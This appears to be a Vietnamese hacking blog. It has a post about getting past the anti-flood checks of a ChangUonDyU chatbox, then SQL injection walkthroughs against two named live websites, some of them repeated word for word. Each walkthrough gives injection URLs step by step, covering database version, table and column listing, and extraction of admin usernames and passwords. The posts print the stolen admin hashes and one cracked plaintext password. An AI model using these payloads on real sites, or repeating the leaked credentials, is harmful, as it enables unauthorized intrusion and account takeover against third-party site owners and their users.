Tuesday, July 31, 2012

Flood ChangUonDyU Chatbox (Bypass Anti Flood)

Flood này thì nhiều bạn biết rồi, nhưng đó là với server config chatbox:
$config['check_domain_reffer'] = false; // Kiem tra site gui yeu cau
$config['check_chatbox_key'] = false; // Kiem tra tu khoa chat box
 Còn với server config:
$config['check_domain_reffer'] = true; // Kiem tra site gui yeu cau
$config['check_chatbox_key'] = true; // Kiem tra tu khoa chat box
Thì hãy xem clip bên trên và suy nghĩ xem Juno_okyo đã bypass Anti Flood của ChangUonDyU như nào nhé! :D

P/S: chân thành xin lỗi BeYeuGroup vì đã test chatbox mà ko báo trước :D.

* Trong clip trên còn 1 điều, đó là Juno ko hề login BYG, và nick flood kia là fake và suýt bị mod ban =))

[TUT] - SQL http://phim.haylem.net (fake HTML)

Cũng là Rewrite đuôi thành HTML.

Tutorial:

Get version
http://phim.haylem.net/the-loai/Hanh...7e,version()))
and 'a'='a/page-1.html

Get table

http://phim.haylem.net/the-loai/Hanh...se()+limit+0,1
))) and 'a'='a/page-1.html
Thay limit 0,1 bởi limit 1,1 ..... limit 12,1 ta được tất cả table

Get column

http://phim.haylem.net/the-loai/Hanh...6572+limit+2,1
))) and 'a'='a/page-1.html

Get data admin

http://phim.haylem.net/the-loai/Hanh...user+limit+0,1
))) and 'a'='a/page-1.html

Ta được:
 
admin|b56f4ab266bd60dc6e8ff73ed

[TUT] - SQL http://phim.haylem.net (fake HTML)

Cũng là Rewrite đuôi thành HTML.

Tutorial:

Get version
http://phim.haylem.net/the-loai/Hanh...7e,version()))
and 'a'='a/page-1.html

Get table

http://phim.haylem.net/the-loai/Hanh...se()+limit+0,1
))) and 'a'='a/page-1.html
Thay limit 0,1 bởi limit 1,1 ..... limit 12,1 ta được tất cả table

Get column

http://phim.haylem.net/the-loai/Hanh...6572+limit+2,1
))) and 'a'='a/page-1.html

Get data admin

http://phim.haylem.net/the-loai/Hanh...user+limit+0,1
))) and 'a'='a/page-1.html

Ta được:
 
admin|b56f4ab266bd60dc6e8ff73ed

[TUT] - SQL http://gametienlen.net (fake HTML)

Site này rewrite domain thành .html chứ thực ra là ASPX

Tutorial:


Get version

http://gametienlen.net/gameonline/GA...t,@@VERSION)--
-.html

Get data

http://gametienlen.net/gameonline/GA...t,DB_NAME())--
-.html

Get table

Table đầu tiên

http://gametienlen.net/gameonline/GA...chema.tables))
-- -.html
http://gametienlen.net/gameonline/GA..._Schema.tables
+where+table_name+not+in('tb_user_group'))) -- -.html

Tất cả các table

http://gametienlen.net/gameonline/GA..._Schema.tables
+where+table_name+not+in('tb_account' ,'tb_quangcao','tb_comment','tb_game_phone_type',' tb_thanhvien','tb_user_group')))-- -.html

Get column của
'tb_account'
Column đầu tiên

http://gametienlen.net/gameonline/GA...#39;tb_account
')) -- -.html

Column user va pass

http://gametienlen.net/gameonline/GA...#39;tb_account
' +and+column_name+not+in+('pass' ,'username','id_email','id_account'))) -- -.html

Get username

http://gametienlen.net/gameonline/GAME_AVATAR'+and
1=convert(int,(select top 1 username from tb_account)) -- -.html

Get password

http://gametienlen.net/gameonline/GAME_AVATAR'+and
1=convert(int,(select top 1 pass from tb_account)) -- -.html

Cuối cùng ta được:


admin|4438FC033F8AEF433F9DB5348B70E8E5


Crack pass đơn giản:

admin|123698745

[TUT] - SQL http://gametienlen.net (fake HTML)

Site này rewrite domain thành .html chứ thực ra là ASPX

Tutorial:


Get version

http://gametienlen.net/gameonline/GA...t,@@VERSION)--
-.html

Get data

http://gametienlen.net/gameonline/GA...t,DB_NAME())--
-.html

Get table

Table đầu tiên

http://gametienlen.net/gameonline/GA...chema.tables))
-- -.html
http://gametienlen.net/gameonline/GA..._Schema.tables
+where+table_name+not+in('tb_user_group'))) -- -.html

Tất cả các table

http://gametienlen.net/gameonline/GA..._Schema.tables
+where+table_name+not+in('tb_account' ,'tb_quangcao','tb_comment','tb_game_phone_type',' tb_thanhvien','tb_user_group')))-- -.html

Get column của
'tb_account'
Column đầu tiên

http://gametienlen.net/gameonline/GA...#39;tb_account
')) -- -.html

Column user va pass

http://gametienlen.net/gameonline/GA...#39;tb_account
' +and+column_name+not+in+('pass' ,'username','id_email','id_account'))) -- -.html

Get username

http://gametienlen.net/gameonline/GAME_AVATAR'+and
1=convert(int,(select top 1 username from tb_account)) -- -.html

Get password

http://gametienlen.net/gameonline/GAME_AVATAR'+and
1=convert(int,(select top 1 pass from tb_account)) -- -.html

Cuối cùng ta được:


admin|4438FC033F8AEF433F9DB5348B70E8E5


Crack pass đơn giản:

admin|123698745